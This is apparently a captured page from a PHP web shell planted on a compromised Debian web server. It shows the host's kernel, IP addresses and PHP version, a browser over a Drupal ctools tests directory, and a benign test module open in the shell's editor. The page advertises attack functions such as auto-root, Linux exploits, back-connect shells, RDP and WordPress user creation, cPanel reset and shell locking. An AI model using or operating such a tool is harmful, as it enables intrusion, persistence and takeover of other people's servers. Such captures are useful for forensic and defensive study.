Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.141.201.92
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
ctools_export_test
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
context.test
1.9
KB
-rw-r--r--
css.test
3.47
KB
-rw-r--r--
css_cache.test
1.11
KB
-rw-r--r--
ctools.drush.sh
2.59
KB
-rw-r--r--
ctools.plugins.test
3.96
KB
-rw-r--r--
ctools_plugin_test.info
509
B
-rw-r--r--
ctools_plugin_test.module
1.53
KB
-rw-r--r--
math_expression.test
6.35
KB
-rw-r--r--
math_expression_stack.test
1.79
KB
-rw-r--r--
object_cache.test
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ctools_plugin_test.module
<?php /** * Define some plugin systems to test ctools plugin includes. */ /** * Implementation of hook_ctools_plugin_dierctory() */ function ctools_plugin_test_ctools_plugin_directory($module, $plugin) { if ($module == 'ctools_plugin_test') { return 'plugins/' . $plugin; } } function ctools_plugin_test_ctools_plugin_type() { return array( 'extra_defaults' => array( 'defaults' => array( 'bool' => true, 'string' => 'string', 'array' => array('some value'), ), ), 'cached' => array( 'cache' => TRUE, 'classes' => array( 'handler', ), ), 'not_cached' => array( 'cache' => FALSE, 'classes' => array( 'handler', ), ), 'big_hook_cached' => array( 'cache' => TRUE, 'use hooks' => TRUE, 'classes' => array( 'handler', ), ), 'big_hook_not_cached' => array( 'cache' => FALSE, 'use hooks' => TRUE, 'classes' => array( 'handler', ), ), ); } function ctools_plugin_test_ctools_plugin_test_big_hook_cached() { return array( 'test1' => array( 'function' => 'ctools_plugin_test_hook_cached_test', 'handler' => 'class1', ), ); } function ctools_plugin_test_ctools_plugin_test_big_hook_not_cached() { return array( 'test1' => array( 'function' => 'ctools_plugin_test_hook_not_cached_test', 'class' => 'class1', ), ); } function ctools_plugin_test_hook_cached_test() {} function ctools_plugin_test_hook_not_cached_test() {}
Close